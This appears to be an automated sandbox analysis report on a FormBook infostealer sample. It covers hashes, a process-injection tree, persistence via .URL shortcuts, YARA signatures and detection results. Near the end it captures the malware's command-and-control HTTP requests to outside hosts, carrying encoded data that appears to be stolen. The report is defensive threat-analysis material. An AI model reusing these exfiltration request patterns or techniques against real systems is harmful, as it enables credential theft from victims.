Loading ...

Play interactive tourEdit tour

Analysis Report Mqbmupv_Signed_.exe

Overview

General Information

Sample Name:Mqbmupv_Signed_.exe
Analysis ID:288093
MD5:20a3b044b6d1b39051e35269e6590c0b
SHA1:bc6bc3a617091a5f13dcfe134b3a55d19e8f77e6
SHA256:2ead77594bc7d6fb376764fad896f830955a1ac70155c0f9feb42299f5c788a9
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Mqbmupv_Signed_.exe (PID: 6892 cmdline: 'C:\Users\user\Desktop\Mqbmupv_Signed_.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
    • notepad.exe (PID: 344 cmdline: C:\Windows\System32\Notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)
      • cmd.exe (PID: 6308 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6316 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ieinstal.exe (PID: 6544 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Mqbmnet.exe (PID: 6912 cmdline: 'C:\Users\user\AppData\Local\Mqbmnet.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
          • ieinstal.exe (PID: 2212 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • Mqbmnet.exe (PID: 5976 cmdline: 'C:\Users\user\AppData\Local\Mqbmnet.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
          • ieinstal.exe (PID: 5204 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • autochk.exe (PID: 1748 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • ipconfig.exe (PID: 1372 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
        • control.exe (PID: 4864 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Mqbm.urlMethodology_Shortcut_HotKeyDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x87:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\Mqbm.urlMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\Mqbm.urlMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x5c:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x1258:$file: URL=
  • 0x123c:$url_explicit: [InternetShortcut]
00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmpMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x1284:$icon: IconFile=
  • 0x123c:$url_explicit: [InternetShortcut]
00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmpMethodology_Contains_Shortcut_OtherURIhandlersDetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x620:$file: URL=
  • 0x604:$url_explicit: [InternetShortcut]
00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmpMethodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICODetects possible shortcut usage for .URL persistence@itsreallynick (Nick Carr)
  • 0x64c:$icon: IconFile=
  • 0x604:$url_explicit: [InternetShortcut]
0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    Click to see the 49 entries

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    29.2.ieinstal.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
      29.2.ieinstal.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      29.2.ieinstal.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x17539:$sqlite3step: 68 34 1C 7B E1
      • 0x1764c:$sqlite3step: 68 34 1C 7B E1
      • 0x17568:$sqlite3text: 68 38 2A 90 C5
      • 0x1768d:$sqlite3text: 68 38 2A 90 C5
      • 0x1757b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x176a3:$sqlite3blob: 68 53 D8 7F 8C
      9.2.ieinstal.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.2.ieinstal.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        Click to see the 7 entries

        Sigma Overview

        No Sigma rule has matched

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeVirustotal: Detection: 27%Perma Link
        Source: C:\Users\user\AppData\Local\Mqbmnet.exeReversingLabs: Detection: 45%
        Multi AV Scanner detection for submitted fileShow sources
        Source: Mqbmupv_Signed_.exeVirustotal: Detection: 27%Perma Link
        Source: Mqbmupv_Signed_.exeReversingLabs: Detection: 45%
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: 29.2.ieinstal.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 9.2.ieinstal.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: C:\Windows\SysWOW64\notepad.exeCode function: 2_2_5048518C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,2_2_5048518C
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4x nop then pop esi9_2_00417274
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4x nop then pop edi9_2_00416BCD
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 4x nop then pop edi9_2_00417CA7

        Networking:

        barindex
        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
        Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49754
        Source: global trafficHTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1Host: www.thelocaladda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1Host: www.kingofinvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
        Source: Joe Sandbox ViewIP Address: 162.159.129.233 162.159.129.233
        Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
        Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
        Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
        Source: global trafficHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 4a 36 4f 4d 44 34 64 51 39 4f 77 6c 33 53 73 77 52 43 4d 77 4f 72 48 4d 76 68 77 62 71 7e 43 68 36 61 41 71 58 28 76 4b 30 75 38 44 5a 73 2d 31 2d 48 73 53 76 4e 64 6b 44 4a 5f 6c 70 4b 52 65 6e 6c 34 50 63 69 55 4c 64 58 58 49 55 6d 7a 43 77 43 76 7a 56 52 62 68 63 6a 6d 76 47 59 69 39 33 72 67 66 69 66 5a 72 79 79 38 6c 77 61 49 72 6f 72 69 4b 35 35 65 52 6f 38 74 4f 75 55 30 31 76 37 4d 31 41 38 78 52 6b 4a 47 55 68 55 62 77 67 77 5f 58 75 44 48 79 70 35 77 6b 74 49 5f 47 68 79 73 55 6a 69 42 65 79 32 4e 30 4a 54 66 5a 61 30 71 53 45 76 7a 36 62 75 62 28 39 47 73 58 48 66 64 70 59 55 33 4b 6d 34 79 49 5a 73 50 57 4f 49 4d 63 46 57 56 6e 73 38 39 61 47 65 7a 65 38 64 74 79 44 33 6a 6a 6b 79 6c 4b 70 69 33 73 68 61 46 59 34 4b 47 47 65 49 41 76 63 41 58 75 5a 68 4e 75 70 31 35 5a 71 47 52 39 70 35 75 37 69 32 77 32 63 52 59 34 77 71 56 34 42 70 43 4a 56 6d 52 38 6e 69 38 49 5a 34 73 78 39 52 31 6a 5f 65 49 67 46 68 59 67 73 61 51 36 37 6e 45 7e 55 56 32 41 79 32 39 55 54 62 30 62 6e 6e 54 7e 6a 73 71 7a 43 4e 63 64 33 34 4b 57 78 38 72 57 2d 37 4a 6a 6b 6f 5f 79 69 5a 48 32 70 30 54 53 67 62 64 69 32 6e 71 6d 47 58 4e 35 55 4b 63 55 41 65 58 56 48 49 56 36 41 7a 72 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATxxQxK=5zCUsJ6OMD4dQ9Owl3SswRCMwOrHMvhwbq~Ch6aAqX(vK0u8DZs-1-HsSvNdkDJ_lpKRenl4PciULdXXIUmzCwCvzVRbhcjmvGYi93rgfifZryy8lwaIroriK55eRo8tOuU01v7M1A8xRkJGUhUbwgw_XuDHyp5wktI_GhysUjiBey2N0JTfZa0qSEvz6bub(9GsXHfdpYU3Km4yIZsPWOIMcFWVns89aGeze8dtyD3jjkylKpi3shaFY4KGGeIAvcAXuZhNup15ZqGR9p5u7i2w2cRY4wqV4BpCJVmR8ni8IZ4sx9R1j_eIgFhYgsaQ67nE~UV2Ay29UTb0bnnT~jsqzCNcd34KWx8rW-7Jjko_yiZH2p0TSgbdi2nqmGXN5UKcUAeXVHIV6AzriA).
        Source: global trafficHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.thelocaladda.comConnection: closeContent-Length: 184809Cache-Control: no-cacheOrigin: http://www.thelocaladda.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thelocaladda.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 35 7a 43 55 73 49 79 77 4e 7a 38 41 62 75 71 78 6b 6a 4f 6b 30 52 7a 53 30 4e 65 42 46 64 67 4a 53 59 37 66 68 37 71 63 6e 32 50 62 5a 6c 65 38 49 37 31 32 78 65 48 72 55 76 4e 65 67 44 55 47 35 50 50 63 65 6d 68 47 50 63 71 54 46 37 54 65 49 45 6e 31 42 51 47 66 37 31 45 66 68 65 6e 58 75 6b 31 78 33 58 6e 67 62 53 58 62 67 79 50 75 73 52 57 78 31 4a 48 6e 4d 49 51 59 53 66 4d 5a 4e 4e 70 52 6b 75 6e 4b 6b 43 67 71 4e 31 35 36 65 57 41 75 7e 51 4d 34 59 49 65 61 76 59 31 38 6a 6f 70 4b 61 7a 61 74 57 54 71 4c 50 41 75 76 78 34 48 69 65 4c 46 4d 53 44 79 49 69 64 4f 47 31 65 79 6b 4d 55 4c 33 6d 4e 6b 70 45 31 51 71 43 36 45 59 51 4f 55 7a 54 6e 28 54 6a 5f 6f 6f 5a 45 58 30 51 39 45 56 28 52 66 76 70 77 33 61 4e 2d 36 76 77 52 72 56 51 66 75 72 4f 74 52 50 6f 66 73 6c 68 5a 67 6a 6f 5a 31 44 53 36 47 44 6f 35 39 35 37 78 76 51 32 66 42 77 32 41 47 49 37 45 70 43 54 45 32 69 7a 33 79 34 64 35 6f 55 31 2d 64 36 34 34 75 42 6a 46 67 66 67 75 79 50 36 37 6e 69 7e 56 55 68 41 47 65 39 56 42 54 72 59 41 7a 50 38 6a 74 6f 30 57 68 53 47 77 51 61 57 79 4d 72 4d 72 47 65 6a 55 51 5f 34 52 78 45 33 4c 63 54 52 51 62 64 6f 6d 6d 39 6a 47 79 6d 39 68 28 50 52 69 79 48 61 54 68 31 79 7a 61 77 33 2d 6c 42 44 56 7a 54 63 50 77 58 36 56 4d 70 70 55 75 61 65 6d 79 5f 59 73 77 74 76 64 65 4c 58 67 55 72 38 34 45 59 6a 53 41 56 37 4b 4c 68 6a 6d 55 6f 61 6b 6e 33 67 6f 6a 52 67 6d 77 6d 6b 2d 72 69 75 77 31 6f 6a 36 73 68 39 74 58 75 57 33 73 45 65 5a 37 69 32 56 71 63 67 33 7e 4b 47 55 58 57 6a 73 70 73 37 69 78 68 4b 69 74 33 72 64 56 6f 61 6e 74 49 28 43 31 5f 4b 6a 70 45 50 72 42 54 33 34 39 69 44 44 67 67 62 44 48 32 37 47 78 5a 73 48 66 31 34 65 71 33 52 44 70 69 70 54 30 58 48 51 30 31 6a 2d 6e 4b 56 72 41 54 4e 4f 4e 34 53 54 38 6b 71 64 42 62 72 79 55 42 55 53 67 6d 76 54 54 5a 6d 50 4a 36 36 54 69 31 39 37 54 41 52 50 38 42 35 75 63 68 59 6e 59 55 41 43 49 4b 45 62 32 68 43 71 7a 57 51 76 61 50 43 57 74 75 49 73 71 77 6c 77 43 41 33 70 75 48 4a 35 35 30 44 4f 50 70 32 4c 71 47 64 4a 74 73 38 57 38 5a 4c 30 46 6e 7a 70 61 76 4f 78 43 4e 54 4e 43 37 28 63 4f 61 42 39 48 68 41 4a 39 57 57 58 43 30 42 56 75 63 64 5f 42 58 6b 39 6c 35 28 78 69 6a 63 52 70 52 63 5f 4d 69 76 47 31 35 4a 4c 7a 41 6b 4c 69 33 31 35 5a 49 39 4f 67 4e 4a 77 6d 66 68 68 4d 65 45 70 72 6a 34 61 4c 6a 7a 33 66 55 67 36 4d 2d 74 73 68 55 58 7a 63 30 66 52 78 58 76 63 30 39 77 7a 38 56 6a 68 6d 6d 52 66 4e 31 52 6d 54 58 66 66 6d 66 74 55 72 61 5a 50 68 77 4c 5f 6d 58 75 48 6c 45 38 55 57 58 66 4c 6c 35 48 70 35 35 6d 71 76 45 28 67 53 53 33 49 62 56 4f 6b 3
        Source: global trafficHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.kingofinvest.comConnection: closeContent-Length: 413Cache-Control: no-cacheOrigin: http://www.kingofinvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kingofinvest.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 52 48 52 31 6d 6c 4d 39 56 42 76 5a 4a 67 71 72 7e 67 65 75 68 4d 58 43 63 64 42 7a 54 44 53 64 62 38 42 4f 4b 53 64 63 34 5f 77 37 79 4e 48 71 31 30 78 52 75 70 77 31 58 4b 54 76 33 74 79 64 78 48 4f 5f 65 71 71 74 61 44 4d 6b 36 47 62 74 52 74 36 66 50 32 6f 6c 62 4f 33 50 63 50 4b 35 62 69 43 2d 54 46 66 6b 28 58 75 39 56 7a 6f 6f 61 36 4c 44 4e 74 68 57 37 2d 65 47 35 34 44 55 75 35 41 6a 55 38 6e 41 58 4a 75 69 61 6e 48 68 55 59 37 65 73 65 4a 4e 78 70 69 49 6e 66 56 55 68 2d 5a 45 72 41 68 53 4a 6b 64 66 46 69 50 38 42 6b 6e 58 6a 6b 79 38 37 5a 75 4c 62 44 4c 7a 37 51 6c 62 74 70 36 4a 55 59 43 57 73 54 48 32 62 30 4e 41 59 4e 45 69 38 5f 74 45 43 74 52 4f 49 7a 39 2d 58 2d 75 46 56 4a 44 77 46 57 65 4b 6d 34 4d 76 6a 73 35 49 69 4f 79 74 30 73 66 41 66 63 61 44 70 55 39 32 31 58 74 52 4e 52 73 64 78 4f 68 62 71 33 4c 45 66 78 59 72 30 77 57 34 78 73 6b 5a 44 4f 45 45 56 37 53 73 6b 35 34 4d 65 45 64 45 4b 35 68 37 59 6d 68 62 48 52 6b 42 52 31 69 63 66 33 7e 45 32 71 45 5f 68 78 46 62 6c 45 67 4f 6c 4d 44 34 42 58 63 75 58 52 41 76 79 32 48 56 53 49 45 6e 65 67 35 68 39 59 77 48 34 39 45 33 55 30 47 67 7e 61 76 65 33 34 63 55 4c 4d 50 73 31 36 66 45 77 52 76 54 64 31 6a 6e 31 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ATxxQxK=RHR1mlM9VBvZJgqr~geuhMXCcdBzTDSdb8BOKSdc4_w7yNHq10xRupw1XKTv3tydxHO_eqqtaDMk6GbtRt6fP2olbO3PcPK5biC-TFfk(Xu9Vzooa6LDNthW7-eG54DUu5AjU8nAXJuianHhUY7eseJNxpiInfVUh-ZErAhSJkdfFiP8BknXjky87ZuLbDLz7Qlbtp6JUYCWsTH2b0NAYNEi8_tECtROIz9-X-uFVJDwFWeKm4Mvjs5IiOyt0sfAfcaDpU921XtRNRsdxOhbq3LEfxYr0wW4xskZDOEEV7Ssk54MeEdEK5h7YmhbHRkBR1icf3~E2qE_hxFblEgOlMD4BXcuXRAvy2HVSIEneg5h9YwH49E3U0Gg~ave34cULMPs16fEwRvTd1jn1A).
        Source: global trafficHTTP traffic detected: POST /ksh/ HTTP/1.1Host: www.kingofinvest.comConnection: closeContent-Length: 184809Cache-Control: no-cacheOrigin: http://www.kingofinvest.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kingofinvest.com/ksh/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 54 78 78 51 78 4b 3d 52 48 52 31 6d 6b 55 44 5a 52 36 66 65 69 7e 75 38 77 4f 51 72 63 6e 63 4c 4e 38 70 44 68 43 6e 46 39 68 6b 4b 54 4d 30 68 75 67 54 31 75 50 71 33 33 5a 63 6a 70 77 36 66 71 54 75 6d 64 32 50 38 33 6e 79 65 72 75 44 61 44 31 79 73 77 33 6f 53 39 36 75 4f 57 74 42 4b 65 7a 59 63 4e 7e 51 62 42 7a 34 55 46 6a 6b 31 48 47 5f 61 79 35 75 64 37 48 51 41 39 39 58 35 36 61 62 35 4f 28 38 76 61 38 64 64 64 37 43 56 4f 53 70 57 48 33 4a 43 62 62 42 69 75 4e 4b 7e 49 32 58 36 73 77 54 73 62 30 78 33 56 56 52 41 30 46 42 4f 41 57 44 45 51 57 68 76 55 43 6f 37 61 50 77 42 68 50 75 28 54 41 58 76 62 66 42 4e 38 36 55 31 79 48 59 4e 48 70 78 61 4e 55 64 68 4b 52 44 55 39 38 61 50 78 30 31 49 50 47 32 59 62 6e 43 4f 45 47 79 6c 72 67 6e 72 4d 70 6e 75 70 48 74 6d 39 7e 4e 63 65 33 51 32 45 39 64 33 58 74 56 5a 78 73 4c 36 49 39 71 70 48 61 69 66 79 34 48 7e 44 43 39 79 71 6b 5a 4e 4c 5a 34 58 4c 43 65 72 74 45 65 54 6e 78 44 49 2d 68 59 64 6d 68 39 48 51 49 38 52 31 69 51 66 32 7e 2d 6b 6f 34 5f 6e 6b 4a 79 78 44 55 34 6a 4d 43 69 43 44 34 73 4d 58 73 5f 79 79 6a 56 41 4e 41 4e 65 54 5a 68 72 5a 41 45 34 5a 51 33 56 6b 47 67 34 61 75 6f 37 34 31 48 50 4f 69 52 6b 35 54 73 31 6e 65 6a 59 55 4b 66 70 62 62 71 37 52 37 35 4e 56 4d 71 77 5a 59 4c 47 2d 4e 67 76 32 69 54 64 75 4b 52 6e 69 7e 5a 4c 43 46 62 66 79 4d 30 50 5f 33 34 67 50 69 6d 45 32 76 35 4e 6b 34 57 71 6a 6a 74 6e 72 42 66 66 39 70 6d 32 48 37 42 4f 6e 31 66 30 54 50 4a 52 4c 6e 41 67 46 64 43 32 69 53 4a 54 4d 6a 31 51 47 54 38 59 44 50 30 61 4b 68 74 28 57 78 30 6f 76 72 41 69 43 58 47 42 4c 68 70 6e 7a 62 71 4b 56 65 50 36 57 72 2d 28 4e 71 69 5a 79 56 5f 38 5a 56 62 57 43 39 71 4d 69 42 65 79 5a 58 47 62 65 75 70 52 4c 38 61 44 70 59 36 4b 68 65 5a 4a 5f 49 46 42 44 35 30 64 49 63 7a 76 61 76 6e 6e 54 42 62 75 75 54 54 62 2d 39 52 32 79 65 75 61 61 49 75 5a 4d 43 70 28 48 49 57 59 56 4f 58 55 70 79 78 4f 31 4a 51 79 4e 54 7a 53 65 62 74 36 77 66 4f 58 58 42 63 77 39 7a 74 57 6d 69 6b 54 44 37 4f 6b 5f 7e 48 57 4b 34 63 78 5a 44 4d 37 52 59 37 44 35 28 72 35 47 4e 62 67 41 68 78 34 33 45 44 63 32 4e 2d 54 50 5a 49 78 47 44 59 4a 65 54 55 56 52 64 6d 6e 66 73 71 4e 37 39 7a 69 79 67 59 51 49 6e 76 70 30 55 64 41 44 36 62 45 62 59 51 59 67 6e 48 69 73 71 6e 66 38 61 74 42 53 38 51 33 4d 54 53 6e 61 33 32 42 37 68 35 75 6e 71 6b 75 5a 78 58 6a 62 32 33 6f 67 49 67 4c 44 47 56 75 72 52 67 28 46 39 34 41 77 35 52 64 37 52 5a 79 35 71 55 72 33 43 7a 63 7a 63 55 72 31 4c 35 66 49 4d 41 34 41 49 56 4a 4d 6d 70 5a 34 63 64 41 30 4b 63 53 70 6e 61 7e 59 4b 32 6f 47 71 31 72 54 2
        Source: global trafficHTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1Host: www.thelocaladda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: global trafficHTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1Host: www.kingofinvest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
